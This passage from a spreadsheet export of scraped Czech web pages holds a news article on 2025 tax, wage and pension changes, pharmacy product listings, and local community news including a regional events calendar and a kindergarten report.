překročí částku 2 536 500 Kč (společná unijní částka 100 tis. EUR), stanou se plátci DPH hned následující den. Ode dne překročení této částky budou mít podnikatelé 10 pracovních dnů na podání přihlášky k registraci (ne tedy 15 dnů jako v současnosti). Zákon také rozšířil možnosti v oblasti nedobytných pohledávek nebo nově zavedl institut vrácení DPH v případě bezdůvodného obohacení. Plátci DPH je také od 1. ledna 2025 umožněno podat daňové přiznání za zdaňovací období kalendářní čtvrtletí, pokud výše obratu za uplynulý kalendářní rok nepřekročila částku 15 mil. Kč (v minulosti to bylo jen 10 mil. Kč). Přečtěte si také: Limity pro registraci k DPH v roce 2025 Zvýšení daně z lihu V návaznosti na ozdravný balíček pokračuje zvýšení sazby spotřební daně z lihu. V roce 2025 se navýší o 10 % a následně v roce 2026 o 5 %. Pro nadbytečnost se od roku 2025 zrušilo registrační řízení ke spotřební dani a zůstává pouze řízení povolovací, ze kterého bude správce daně automaticky zjišťovat většinu dnes získávaných údajů, např. údaje o bezdlužnosti. Zvýšení daně z tabákových výrobků a zahřívaného tabáku a zavedení daně z alternativních výrobků Od 1. ledna 2025 došlo také ke zvýšení sazeb spotřební daně z cigaret, tabáku ke kouření, doutníků a cigarillos o 5 %. Stejným tempem porostou sazby spotřební daně u těchto výrobků i v letech 2026 a 2027. V letech 2025–2027 dojde také k navyšování sazeb spotřební daně u zahřívaného tabáku, a to tempem 15 % ročně. Zvýšení sazeb spotřební daně se aplikuje i u alternativních tabákových výrobků. Sazba spotřební daně z náplní do elektronických cigaret činí v roce 2025 5 Kč/ml, v případě nikotinových sáčků 0,8 Kč/g. Sazby porostou i v následujících dvou letech. V případě náplní do elektronických cigaret sazba spotřební daně v roce 2027 dosáhne úrovně 10 Kč/ml, u nikotinových sáčků to bude 1,7 Kč/g. Vracení spotřební daně u tzv. zelené nafty Zemědělci mohou od roku 2025 žádat o vratku části spotřební daně ze zelené nafty, tedy nafty prokazatelně používané pro rostlinnou nebo živočišnou výrobu, dvakrát ročně, namísto dosavadní jedné žádosti. Změna se vztahuje na ty subjekty, které uplatňují vratku daně vyšší než 50 000 Kč za rok. Snížená sazba spotřební daně pro malé nezávislé pivovary Malé pivovary vzájemně hospodářsky a právně závislé mohou nově při splnění několika podmínek (limit výroby, výrobní nezávislost) dosáhnout ze zákona na sníženou sazbu spotřební daně z piva a hledí se na ně jako na malé nezávislé pivovary. Úprava zdaňovacího období pro malé plátce daně z elektřiny Plátci daně z elektřiny, kteří mají daňový základ nižší než 350 MWh ročně (což odpovídá výši daně cca 10 000 Kč ročně), mají nově prodlouženo zdaňovací období z kalendářního měsíce na kalendářní pololetí. Dotčený plátce bude podávat dvě daňová přiznání ročně namísto stávajících dvanácti, čímž dojde ke značnému snížení jeho administrativní zátěže. Nová podmínka pro obchodování s cennými papíry a podíly v obchodní korporaci Od 1. ledna 2025 se zavádí limit pro osvobození od daně na příjmy z prodeje cenných papírů a podílů v souhrnné výši 40 mil. Kč za rok. Tento limit se vztahuje na příjmy, u kterých byl splněn tzv. časový test, a to v případě cenných papírů 3 roky a v případě obchodních podílů 5 let. Pokud došlo k prodeji cenného papíru/obchodního podílu v roce 2024, ale peněžní prostředky budou příjemci vyplaceny až v roce 2025, spadají tyto příjmy do nově zavedeného limitu 40 mil. Kč. Zvýšení minimální mzdy a zavedení valorizačního mechanismu Od roku 2025 se výše minimální mzdy stanovuje za pomoci valorizačního mechanismus. Nově se minimální mzda vypočítá jako součin predikce průměrné mzdy v národním hospodářství pro příslušný kalendářní rok a koeficientu, který stanoví vláda nařízením na následující dva roky, přičemž se zaokrouhluje na celé stokoruny nahoru. Minimální mzda je tak v tomto roce 20 800 Kč. Od roku 2025 rovněž došlo ke zrušení zaručené mzdy. Nově je stanoven pouze tzv. zaručený plat pro zaměstnance ve veřejných službách a správě. Přečtěte si také: Minimální mzda se v roce 2025 rekordně zvýší, zaručená mzda ale končí Tuzemské a zahraniční cestovní náhrady Tradičně také dochází ke změně tuzemských cestovních náhrad pro rok 2025. Pro stanovení sazeb stravného je určující vývoj indexů cen jídel a nealkoholických nápojů ve veřejném stravování ve srovnání se statistickými údaji, které byly vzaty jako základ pro zákonem stanovené hodnoty. Přečtěte si také: Tuzemské cestovní náhrady v roce 2025 Vyhláškou se rovněž mění výše zahraničního stravného pro rok 2025. Cílem změn je zajištění dostatečné finanční kompenzace zaměstnancům v případech, kdy je zaměstnavatel vyšle na zahraniční pracovní cestu a v této souvislosti jim vzniknou výdaje na stravování. Přečtěte si také: Zahraniční cestovní náhrady 2025: Téměř 40 změn Změna paušálních náhrad na home office Mění se i paušální náhrada nákladů spojených s prací na dálku, a to z 4,50 na 4,80 Kč/h. Přečtěte si také: Paušální náhrada nákladů na home office se v roce 2025 zvýší Změna výpočtu náhradního plnění Zatímco v minulosti byly všechny tři způsoby plnění povinného podílu zaměstnávat OZP na volném trhu práce rovnocenné, nově jsou zvýhodněni zaměstnavatelé, kteří přímo zaměstnávají OZP v pracovním poměru. Nově se tak výše odvodu do státního rozpočtu, pokud zaměstnavatel nesplňuje 4% podíl OZP, odstupňovala Kdo zaměstnává: alespoň 3 % OZP, platí průměrnou mzdu, alespoň 1 % OZP, platí 2násobek průměrné mzdy, méně než 1 %, platí 3,5násobek průměrné mzdy. Firmy, které nezaměstnávají žádné OZP, tak nově platí více. Přečtěte si také: Změny v náhradním plnění zaměstnavatelů od roku 2025 Zvýšení náhrady mzdy Náhrada mzdy se každoročně upravuje. Také pro rok 2025 již byly ve Sbírce zákonů sděleny nové redukční hranice pro náhradu i jiné nemocenské dávky. Náhrada mzdy se tak poměrně výrazně zvýšila. Přečtěte si také: Náhrada mzdy 2025: Po delší době výrazněji vzroste Měrné ceny i u nepotravinářského zboží Na začátku roku 2025 nabyla účinnosti novela zákona o cenách a také vyhláška o stanovení seznamu druhů balených nepotravinářských výrobků, které podléhají povinnosti být při jejich prodeji spotřebiteli označeny měrnou cenou. Tato povinnost platí sice již dlouho, až do konce loňského roku však nešla vymáhat. Přečtěte si také: Které zboží musí být označeno cenou za jednotku? Pozor, po 15 letech to půjde vymáhat Důchodová reforma 1. ledna 2025 nabyly účinnosti první změny v rámci důchodové reformy. Ta přináší kromě výše zmíněných slev na pojistném pro pracující seniory například i zvýšení sociálního pojištění pro některé zaměstnavatele. Pro zaměstnavatele náročných profesí se letos pojištění zvýšilo na 26,8 % z vyměřovacího základu stanoveného podle § 5a odst. 1 písm. c), z toho 2,1 % na nemocenské pojištění, 23,5 % na důchodové pojištění a 1,2 % na státní politiku zaměstnanosti. O 1 p. b. navíc poroste i v dalších letech. Přečtěte si také: Části zaměstnavatelů se zvýší sociální pojištění za zaměstnance Reforma dále prodlužuje věk odchodu do důchodu, který se zastropuje na 67 letech. Prodloužení věku odchodu do důchodu se nicméně netýká ročníků 1965 a starších. Dále dochází k parametrickým úpravám, které zpomalí růst nově přiznávaných penzí. Přečtěte si také: Do penze se půjde až v 67 letech. Které další novinky přináší důchodová reforma? Chci odebírat newsletter největší server pro podnikatele v ČR Přehled aktuálních článků. Každý den v mailu. Autor: Daniel Morávek Autor Daniel Morávek</t>
  </si>
  <si>
    <t>24860</t>
  </si>
  <si>
    <t>16590</t>
  </si>
  <si>
    <t>20250101_441_3693238897_4e79ee03e9db165aa122.html</t>
  </si>
  <si>
    <t>4e79ee03e9db165aa122</t>
  </si>
  <si>
    <t>GENGIGEL gel na dásně 20ml z lékárny Benu.cz</t>
  </si>
  <si>
    <t>GENGIGEL gel na dásně 20ml z lékárny Benu.cz Published 1.1.2025 By GENGIGEL gel na dásně 20ml od výrobce Ricerfarma SRL je k dostání za cenu 309 Kč. Přejít do obchodu. Gengigel, zdravotnický prostředek, je inovativní gel na dásně s kyselinou hyaluronovou. Vytváří ochranný film, který zklidňuje dásně, urychluje hojení, snižuje zánět, obnovuje zdravé dásně. Pomáhá při zánětech dásní, parodontitidě, poškozené sliznici po chirurgických zákrocích v dutině ústní.Gengigel je vysoce přilnavý, čímž zajišťuje, aby se kyselina hyaluronová (která by jinak byla eliminována působením slin) zůstala po dlouhou dobu v požadovaném místě účinku.Vhodné i pro děti, těhotné ženy a starší osoby.Velikost balení je 20 ml. Kolik je poštovné? Objednávku si můžete poslat na některou z 268mi kamenných lékáren a potom je doprava zdarma. Jaké jsou další možnosti?: PPL: Přepravné 79,- Kč, dobírkovné 39,-Kč, PPL ParcelShop 55 Kč Zásilkovna: 49,- Kč, dobírkovné 39,- Kč GLS: Přepravné 99,- Kč, dobírkovné 39,-Kč Při objednávce na 999 Kč je doprava PPL, Zásilkovnou nebo Českou poštou zdarma. Minimální výše objednávky je 100 Kč. Objednejte si GENGIGEL gel na dásně 20ml výhodně na internetu v obchodě Benu.cz dnes a ušetřete. PŘEJÍT DO OBCHODU Pomohl vám článek? Hodnoťte jej: Vaše e-mailová adresa nebude zveřejněna. Vyžadované informace jsou označeny * Komentář * Swissdent CRYSTAL regenerační zubní krém 50ml z lékárny Benu.cz Published 8.1.2025 By Swissdent CRYSTAL regenerační zubní krém 50ml od výrobce PROFIMED je k dostání za cenu 299 Kč. Přejít do obchodu. Swissdent CRYSTAL regenerační zubní krém zaručuje přirozený bělící efekt, vysokou obnovu struktury zubní skloviny a snížení citlivosti zubů. Dodává nejšetrnějším způsobem zubům světlejší a mladší odstín. Ideální i jako regenerační noční kůra při domácím, či ordinačním bělení zubů. Hodí se pro citlivé a často bělené zuby. Obsahuje rostlinný enzym papain, který účinně odstraňuje zubní plak a preventivně chrání před zubním kazem. Velmi nízké RDA 14. Neobsahuje parabeny, fluoridy, SLS. Balení obsahuje 50 ml. Kolik je poštovné? Objednávku si můžete poslat na některou z 268mi kamenných lékáren a potom je doprava zdarma. Jaké jsou další možnosti?: PPL: Přepravné 79,- Kč, dobírkovné 39,-Kč, PPL ParcelShop 55 Kč Zásilkovna: 49,- Kč, dobírkovné 39,- Kč GLS: Přepravné 99,- Kč, dobírkovné 39,-Kč Při objednávce na 999 Kč je doprava PPL, Zásilkovnou nebo Českou poštou zdarma. Minimální výše objednávky je 100 Kč. Objednejte si Swissdent CRYSTAL regenerační zubní krém 50ml výhodně na internetu v obchodě Benu.cz dnes a ušetřete. PŘEJÍT DO OBCHODU Pomohl vám článek? Hodnoťte jej: Swissdent Extreme intenzivní bělicí zubní pasta 50ml z lékárny Benu.cz Published 8.1.2025 By Swissdent Extreme intenzivní bělicí zubní pasta 50ml od výrobce PROFIMED je k dostání za cenu 259 Kč. Přejít do obchodu. Zubní pasta SWISSDENT EXTREME je určena k bělení nadměrně zabarvených zubů. Výjimečné složení přírodních enzymů a peroxidu vápenatého účinně odstraňuje výrazné pigmentace způsobené kouřením, pitím kávy, čaje a červeného vína . Obsahuje koenzym Q10 a vitamín E pro revitalizaci a péči o dásně.Intenzivní bělení a péče v jedné pastěSložení SWISSDENT EXTREME s dvojitou dávkou přírodních enzymů, jedlou sodou, a peroxidem vápenatým účinně odstraňuje vnější výrazné pigmentace zubů a neutralizuje kyseliny v ústech.Obohaceno o koenzym Q10 a vitamín E pro revitalizaci a péči o dásně.Hodnota abrazivity – RDA 40 – je 5x nižší než maximální dovolená hranice. Běžné bělicí pasty mají často hodnoty RDA 120 –150, některé dokonce až RDA 200.Výrazná mentolová příchuť osvěží dech na několik hodin.Obsahuje fluoridy – 1180 ppmF.Pasta pro větší šetrnost neobsahuje SLS (sodium lauryl sulfát), pěnivý prostředek, jemuž je přičítán podíl na vzniku aftů a má dráždivý účinek na citlivou ústní sliznici.Švýcarská zubní pasta SWISSDENT EXTREME si klade za cíl zesvětlit povrch zubu pomocí kombinace enzymů a mikronizované peroxidové formule, aniž by bylo potřeba používat silikáty s vysokou hodnotou abrazivity dentinu (RDA). Extra účinné složení z přírodních enzymů papainu a bromelainu je zkombinováno s patentovaným mikronizovaným peroxidem vápníku v bezpečné koncentraci 0,1 %. Přírodní enzymy získávané z ananasu a papáji velmi efektivně odstraňují proteinovou vrstvu na povrchu zubu, tedy zubní plak a vnější zabarvení. Jako jedna z mála past na trhu obsahuje mikronizovaný peroxid vápníku, který působí i mezi krystaly skloviny, kde chemickou reakcí zprůhlední molekuly pigmentů.Objem: 50 ml. Kolik je poštovné? Objednávku si můžete poslat na některou z 268mi kamenných lékáren a potom je doprava zdarma. Jaké jsou další možnosti?: PPL: Přepravné 79,- Kč, dobírkovné 39,-Kč, PPL ParcelShop 55 Kč Zásilkovna: 49,- Kč, dobírkovné 39,- Kč GLS: Přepravné 99,- Kč, dobírkovné 39,-Kč Při objednávce na 999 Kč je doprava PPL, Zásilkovnou nebo Českou poštou zdarma. Minimální výše objednávky je 100 Kč. Objednejte si Swissdent Extreme intenzivní bělicí zubní pasta 50ml výhodně na internetu v obchodě Benu.cz dnes a ušetřete. PŘEJÍT DO OBCHODU Pomohl vám článek? Hodnoťte jej: Sensodyne zubní pasta Repair&amp;amp;Protect 75ml – balení 2 ks z lékárny Benu.cz Published Honza Sensodyne zubní pasta Repair&amp;amp;Protect 75ml – balení 2 ks od výrobce GlaxoSmithKline je k dostání za cenu 238 Kč. Přejít do obchodu. Sensodyne Repair &amp;amp; Protect je zdravotnický prostředek. Zubní pasta, která pomáhá opravit a chránit citlivé části zubů. S fluoridem pro ochranu před zubním kazem.Výhody:svěží pocit,dlouhotrvající ochrana*,tvorba ochranné vrstvy přes citlivá místa zubů,obsahuje fluorid sodný 1450 ppm F,pro děti od 12 let a dospělé.*při čištění zubů 2x denně Balení obsahuje 75 ml. Kolik je poštovné? Objednávku si můžete poslat na některou z 268mi kamenných lékáren a potom je doprava zdarma. Jaké jsou další možnosti?: PPL: Přepravné 79,- Kč, dobírkovné 39,-Kč, PPL ParcelShop 55 Kč Zásilkovna: 49,- Kč, dobírkovné 39,- Kč GLS: Přepravné 99,- Kč, dobírkovné 39,-Kč Při objednávce na 999 Kč je doprava PPL, Zásilkovnou nebo Českou poštou zdarma. Minimální výše objednávky je 100 Kč. Objednejte si Sensodyne zubní pasta Repair&amp;amp;Protect 75ml – balení 2 ks výhodně na internetu v obchodě Benu.cz dnes a ušetřete. PŘEJÍT DO OBCHODU 4.4/5 - (24 votes) Autor: Honza || | || | | Honza</t>
  </si>
  <si>
    <t>20250101_442_3700669106_c3e841d08da2b1224bc9.html</t>
  </si>
  <si>
    <t>c3e841d08da2b1224bc9</t>
  </si>
  <si>
    <t>Všude zněly koledy</t>
  </si>
  <si>
    <t>Všude zněly koledy V naší městské části se konaly tradiční adventní oslavy, které přinesly kouzelnou atmosféru a radostnou náladu do srdcí všech návštěvníků. Toulcův dvůr, Chalupnická ulice i Veronské náměstí se proměnily v útulná místa plná světel, vůně svařeného vína , punče, vánočního cukroví a opečených klobásek. Program byl pestrý a myslel na všechny generace. Děti nadšeně tvořily v dílničkách, sledovaly loutkové představení a s rozzářenýma očima očekávaly rozsvícení vánočního stromku. Pro všechny byla připravena nejen široká nabídka občerstvení, ale i vystoupení místních pěveckých sborů, dětí z mateřských a základních škol, hudebních a tanečních souborů, které navodily tu pravou sváteční atmosféru. Nechyběla ani světelná a ohnivá show či průvod světel. Návštěvníky potěšily i tradiční jarmarky, kde řemeslníci nabízeli ručně vyráběné dekorace, svíčky, keramiku či dárky, které potěší pod stromečkem. Adventní oslavy opět ukázaly, že setkání a společné prožitky jsou tím nejcennějším darem. Všichni, kdo se akcí zúčastnili, odcházeli domů s úsměvem na tváři, s pocitem klidu a radosti a s očekáváním blížících se Vánoc. „Je krásné sledovat, jak se do vánočních oslav zapojují všechny spolky, kluby a organizace, které sídlí na Patnáctce, a patří jim za to velký dík,“ řekla místostarostka Mgr. Petra Šikýřová, pod jejíž taktovkou se oslavy konaly. Autor: Pavlína Nejedlíková Autor person Pavlína Nejedlíková</t>
  </si>
  <si>
    <t>20250101_443_3703642982_ad14ad0dd8b2221ca800.html</t>
  </si>
  <si>
    <t>ad14ad0dd8b2221ca800</t>
  </si>
  <si>
    <t>Jaký bude rok 2025 a co nás čeká ve Zlínském kraji?</t>
  </si>
  <si>
    <t>Jaký bude rok 2025 a co nás čeká ve Zlínském kraji ? Rubrika: | AKTUÁLNĚ ZE ZLÍNSKÉHO KRAJE 1 – LEDEN ⬛ Oprava zámku Vsetín v lednu míří do finále. Nový rok památka zahájí s novou fasádou, dveřmi, proskleným výtahem i okapy. Obnova přilehlého parku bude hotová v polovině roku. ⬛ Novinkou letošního roku pro cestující v linkových autobusech Integrované dopravy Zlínského kraje je obsluha zastávek v režimu „na znamení“. Pokud chce cestující vystoupit, musí nově zmáčknout před zastávkou tlačítko STOP, jímž svůj záměr oznámí řidiči. ⬛ Od 11. 1. do 2. 2. budou Pustevny tradičně zdobit ledové sochy, tentokrát na téma peklo. ⬛ Změny v tarifu. Zlínský kraj musel s ohledem na inflaci přistoupit k úpravě ceny jízdného ve veřejné dopravě. Co je ale příjemnou novinkou, že držitelé průkazů ZTP nebo ZTP/P budou v krajské dopravě jezdit zdarma. ⬛ Kroměřížská nemocnice slaví! Od jejího vzniku letos uplyne už 115 let. K výročí chystá řadu akcí. ⬛ Krajská nemocnice T. Bati ve Zlíně chystá sérii seminářů – Péče o nemocného v domácím prostředí. První z nich se uskuteční už 15. 1., další 19. 2., 26. 3., 30. 4. a 4. 6. ⬛ Řidiči se letos dočkají deseti kilometrů nové silnice v horském úseku přes Soláň. Silnice, jejíž rekonstrukce začala vloni, má být zcela zprůjezdněna do konce listopadu 2025, úplné dokončení stavebních prací se předpokládá do poloviny roku 2026. Během roku dokončí silničáři rekonstrukce silnic také v Kudlovicích , v Hošťálkové a v Hluku. 2 – ÚNOR ⬛ V Baťově nemocnici vznikne Moderní centrum digestivní endoskopie. Bude se jednat o špičkové pracoviště vybavené rentgeny, dospávacím pokojem a větším počtem vyšetřoven, které umožní rozšířit spektrum endoskopických výkonů a vyšetření. 3 – BŘEZEN ⬛ Nastávající maminky, přijďte se podívat 20. 3. na den otevřených dveří v porodnici Krajské nemocnice T. Bati ve Zlíně . ⬛ Březen – měsíc čtenářů. Do akce se pravidelně zapojují mnohé knihovny v kraji. Nezapomeňte se podívat na jejich program. 4 – DUBEN ⬛ Zlínský kraj chystá ve dnech 7. až 11. 4. další ročník akce Hravě záchranářem. Na platformě 14|15 Baťova Institutu se znovu vystřídají desítky školáků, kteří se budou učit, jak předcházet nehodám a zvládnout mimořádné události. ⬛ Uherskohradišťská nemocnice zve budoucí maminky na prohlídku nových prostor porodnicko gynekologického oddělení. V rámci dne otevřených dveří 26. 4. mohou nahlédnout do zázemí novorozeneckého oddělení a dovědět se více o předporodních kurzech i poporodní péči. 5 – KVĚTEN ⬛ Zlínský kraj zahájí 1. 5. opět sezonu cyklobusů. Detailní spoje najdete na www.idzk.cz. ⬛ Nové mosty. Po přestavbách budou do konce května znovu v plném provozu mosty v Zubří , ve Valašské Polance a ve Velkých Karlovicích , kde bude následně zahájena přestavba dalšího mostu. Most ve Vsetíně -Jasence bude zprovozněn do konce října. ⬛ Evropský den melanomu připadá na 11. 5. K této příležitosti chystají krajské nemocnice preventivní akce, při kterých lékaři kožního oddělení příchozím zkontrolují mateřská znaménka a doporučí, jak o ně správně pečovat. Sledujte stránky našich nemocnic a informujte se o termínech. ⬛ Národní zahájení 21. ročníku Festivalu muzejních nocí se uskuteční 16. 5. v Luhačovicích . Vyberte si program z pestré nabídky muzeí v našem kraji. ⬛ Zlín film festival. Od 29. 5. do 4. 6. ožije Zlín 65. ročníkem Mezinárodního festivalu filmů pro děti mládež. Nenechte si ujít jeho jedinečnou atmosféru. ⬛ Nahlédněte do kostelů. Máte rovnou dvě příležitosti, kdy sem zavítat. Tradiční Noc kostelů se letos uskuteční 23. 5., nebo je navštivte během celého léta v rámci projektu Otevřené brány. Více o prohlídkách na www.otevrenebrany.cz. 6 – ČERVEN ⬛ Charitativní koncert Filharmonie pod širým nebem. Přijde si užít kvalitní kulturu a podpořit dobrou věc. Akce se uskuteční 12. 6. na platformě 14|15 Baťova Institutu ve Zlíně . ⬛ Zámecký areál v Holešově ožije 20.–21. 6. akcí Holešovská Regata. ⬛ Začátkem léta je plánováno otevření dalšího 7,8 kilometru dlouhého úseku dálnice D49 mezi Holešovem a Fryštákem . ⬛ Nezapomeňte! V polovině června se mění jízdní řády. 7 – ČERVENEC ⬛ Zoo Zlín otevře první záchranné a chovné centrum pro lvy v Česku. Nový domov tu najdou zabavení lvi, které stát odebere soukromníkům z důvodu nevhodných chovatelských podmínek nebo nelegálního chovu, ale také stávající chovný pár lvů konžských a jejich tři potomci. ⬛ Zlínský kraj opět chystá projekt Praktikem na zkoušku. Týdenní stáže pro studenty medicíny u praktických lékařů v regionu. Pro více informací sledujte web kraje. ⬛ Dny 4. až 5. 7. patří tradičně Dnům lidí dobré vůle na Velehradě . ⬛ Sport, koncerty i zábavu nabídne Slovácké léto v Uherském Hradišti , které se uskuteční ve dnech 4. až 13. 7. ⬛ Nové zázemí pro záchranku. Obyvatelé Luhačovic a okolí se v polovině roku dočkají otevření nové výjezdové stanice zdravotnické záchranné služby . Posádkám v Uherském Hradišti zase začnou sloužit nové rozšířené prostory. ⬛ Letní filmová škola. Ve dnech 25. až 31. 7. se v Uherském Hradišti uskuteční už 51. ročník oblíbené „Filmovky“. 8 – SRPEN ⬛ Kdo převezme po Dolní Lhotě titul Vesnice roku Zlínského kraje? To se dozvíme na slavnostním vyhlášení v srpnu. ⬛ Rychlá auta, dunění motoru a jedinečná podívaná. To je Barum Czech Rally Zlín, která se uskuteční 15.–17. 8. ⬛ Slavnostní vyhlášení výsledků XVI. ročníku soutěže TOP Víno Slovácka 2025 se uskuteční 16. 8. v Redutě v Uherském Hradišti . ⬛ Oslava úrody a pocta zemědělcům. Dožínky Zlínského kraje v Kroměříži se uskuteční 23. 8. 9 – ZÁŘÍ ⬛ Nové obory. Střední školy v kraji chystají otevření dvou nových oborů. Ve schvalovacím procesu na ministerstvu školství jsou obor Technické lyceum zaměřené na technologii a design obuvi a výrobků z plastů na SPŠ polytechnické – Centru odborné přípravy Zlín a obor Informační technologie na Střední škole – Centru odborné přípravy technické Uherský Brod . ⬛ S novinkami přichází také Univerzita Tomáše Bati ve Zlíně . Fakulta humanitních studií nabídne navazující magisterský program pro všeobecné sestry – Domácí péče a hospicová péče. Jako první vysoká škola v Česku umožní sestrám absolvovat specializační program na úrovni magisterského studia. Akreditaci má univerzita také na nový bakalářský program Zdravotnický záchranář. Obor poskytne kvalifikaci umožňující práci především u zdravotnické záchranné služby. Ve zdravotnických zařízeních poté bude možné pracovat na jednotkách intenzivní péče, na anesteziologicko-resuscitačních odděleních nebo na urgentních příjmech. ⬛ Loni byl zrušený kvůli povodním, věříme, že letos se potkáme – Den Zlínského kraje je naplánovaný na 27. 9. ⬛ Po více než roce uzavírky s příchodem nového školního roku zprovozní Ředitelství silnic Zlínského kraje po komplexní přestavbě silniční most přes řeku Moravu v Napajedlech . ⬛ Během podzimu bude otevřeno nové Kulturní a kreativní centrum Zlínského kraje v Čiperově vile. Vznikne zde místo nejen pro umělce, zástupce kulturních organizací, ale i žáky uměleckoprůmyslových škol a veřejnost. 10 – ŘÍJEN ⬛ Na podzim bude slavnostně otevřený nový domov pro seniory v Liptále , jehož stavba začala loni v červnu. Půjde o energeticky nenáročnou, plně soběstačnou budovu a jedno z nejmodernějších zařízení v republice. Nový domov tu najde 58 klientů. ⬛ Slovácké divadlo v Uherském Hradišti plánuje letos velkolepé oslavy svých osmdesátin. Kromě slavnostního narozeninového týdne, který vyvrcholí v říjnu, připravuje pro stálé diváky také celoroční hru, v níž budou moci divadlo zažít netradičním způsobem. ⬛ Na podzim bude zprovozněna stavba nového mostu přes řeku Moravu v Napajedlech , který bude součástí stavby dálnice D55. 11 – LISTOPAD ⬛ Koncem roku začne výstavba nové porodnice v Krajské nemocnici T. Bati ve Zlíně . Jak pokračuje modernizace nemocnice, můžete sledovat na webových stránkách www.budoucnostbatovky.cz. ⬛ K novému nádraží přibude ve Vsetíně také nová Nádražní ulice. Ředitelství silnic Zlínského kraje má do konce listopadu dokončit rekonstrukci půlkilometrového úseku ulice včetně její částečné přeložky do nové polohy a okružní křižovatky. ⬛ Krajská příspěvková organizace Centrum ÁČKO ve Valašském Meziříčí rozšíří kapacity odlehčovací pobytové služby, která pomáhá rodinám dětí s poruchou autistického spektra a dalšími typy postižení. Služba bude nově fungovat po celý týden s kapacitou 6 lůžek. Hotovo má být do konce roku. ⬛ Neurologická jednotka intenzivní péče v KNTB bude mít na podzim po rekonstrukci. Dočká se kompletní výměny elektroinstalace, rozvodů medicinálních plynů, obnovy povrchů, nábytku, přístrojového vybavení i klimatizace. 12 – PROSINEC ⬛ Nezapomeňte! V polovině prosince se mění jízdní řády. ⬛ Prostor pro vzdělávací akce nabídne nové Kulturně-kreativní centrum v areálu Hvězdárny Valašské Meziříčí . Bude místem zaměřeným hlavně na vzdělání, výzkum a inovace s cílem přivést vědu co nejblíže k mladým zájemcům o poznání. Tak ho navštivte! ⬛ V závěru roku začne přístavba budovy chirurgie v Baťově nemocnici. Projekt je plánován především jako rozšíření lůžkových kapacit, ve 2. podlaží se do budoucna počítá s rozšířením stávajícího pracoviště radiodiagnostiky o nový angiosál, ve 3. pak vzniknou nová lůžka chirurgie. 4. podlaží přinese řešení dosud nejpalčivějšího problému neurochirurgického oddělení, kterým je omezená lůžková kapacita. Hotovo má být přesně za rok. ⬛ Autor: (lič) Autor person lič Rubrika transition_slide | AKTUÁLNĚ ZE ZLÍNSKÉHO KRAJE</t>
  </si>
  <si>
    <t>20250101_444_3703755157_6caafcded8c6ce500bf2.html</t>
  </si>
  <si>
    <t>6caafcded8c6ce500bf2</t>
  </si>
  <si>
    <t>Sluníčka Na Sadech</t>
  </si>
  <si>
    <t>Sluníčka Na Sadech Rubrika: Mateřská škola Myslivecké vyprávění Velké poděkování patří slečně Pavlínce, která je myslivec a přišla nám vyprávět o životě lesních zvířátek v zimě a jak se o ně v tuto dobu starat. Názorně nám ukázala shozy srnčí a dančí zvěře, párák prasete divokého a mohli jsme si pohladit i kožíšek lišky obecné. Doplnila to obrázky poznávaných zvířat a naučili jsme se správnou mysliveckou terminologii. Děti nakonec hádaly pohádky, kde jsou v hlavních rolích lesní zvířátka. Divadlo v Besedě Hra se jmenovala Domov a děti se díky této hře měly naučit, že např. ohryzek z jablka nepatří do popelnice, ale do kompostu, že i žížala je velmi užitečná apod. Do hry byly děti aktivně zapojovány, a tak si lépe uvědomily, jak správně zacházet s biologickými odpadky. Byl tu první sníh Jako každý rok je největší radost z prvního sněhu. Tentokrát ho bylo tedy opravdu málo, ale to neznamená, že si ho neužily a neuplácaly pár koulí. Knihovna Velké poděkování patří paní knihovnici Ireně Hankové za příjemná, tvořivá a zábavná dopoledne, která pro naše děti hodně znamenají. Děkujeme za její čas a inspiraci. Pravidelně knihovnu navštěvujeme a na dětech je vidět, že vztah ke knize mají čím dál lepší, a my se těšíme na další návštěvy. Paní knihovnici přejeme hodně zdraví a spokojenosti v novém roce a ať jí práce s dětmi stále baví. Zvoneček Poděkování a přání mnoho štěstí a zdraví patří i divadelnicím z divadla Zvoneček, které k nám pravidelně dojíždějí. Tentokrát to bylo s Vánoční pohádkou. Jejich klasické pohádky mají moderní pojetí, jsou úsměvné, inspirativní a pravdivé. Pohádkové bytosti v nich zažívají skutečné dětské starosti i radosti. Čertí škola pro malé i pokročilé Děkujeme maturantům ze SŠ Č. Velenice pod vedením pí učitelky Mgr. J.Horčicové, kteří v rámci výuky aranžování vytvořili s našimi dětmi andílka z korálků . Během dopoledne jsme všichni společně tancovali na čertovské diskotéce, hráli štafetu s taškou, zaranžovali pekelný koutek a srdečně se zasmáli při hře „Nebe, země, nos“. Naše děti se cítily se studenty dospělejší a studenti si mohli chvíli zablbnout jako děti. S návštěvou jsme se rozloučili s přáním do nového roku, kde studenty čeká maturita. Popřáli jsme jim hodně štěstí a přislíbili jsme, že si s nimi přijdeme ještě před Vánoci zazpívat před jejich školní budovu. Zdobení vánoční školky Vracíme se k tradicím vánočního zdobení tříd s rodiči. Děkujeme tatínkům, maminkám i babičkám, kteří přišli a pomohli dětem vyrobit např. tradiční svícny z ovoce, klasické věnce aj. Věříme, že jim s námi bylo dobře. Poděkování technickým službám Chtěli bychom touto cestou poděkovat za celoroční vstřícnost, spolupráci a ochotu, kterou vůči nám projevují naše velenické technické služby. Ke konci roku jsme je neplánovaně s dětmi navštívili a bylo to velmi vstřícné setkání. Děti si mohly sednout do traktoru i na sekačku a byly jak v „Jiříkově vidění“. Díky za vše. Mikuláš Letošní Mikuláš v podobě Michala Zikeše nám udělal velkou radost a naše děti z něj byly nadšeny. Děti poctivě odrecitovaly básničky, zazpívaly písničku a zatančily si s ním čertovský taneček. Dostaly od něj za to sladkou nadílku. Zaměstnanci MŠ Na Sadech Vám v novém roce přejí zdraví a štěstí. Ale nepotřebujete jen štěstí, potřebujete jeden druhého. Rubrika transition_slide Mateřská škola</t>
  </si>
  <si>
    <t>350</t>
  </si>
  <si>
    <t>20250101_445_3727234060_7040ea81f40ce9e6667b.html</t>
  </si>
  <si>
    <t>7040ea81f40ce9e6667b</t>
  </si>
  <si>
    <t>DIVADLO V CELETNÉ</t>
  </si>
  <si>
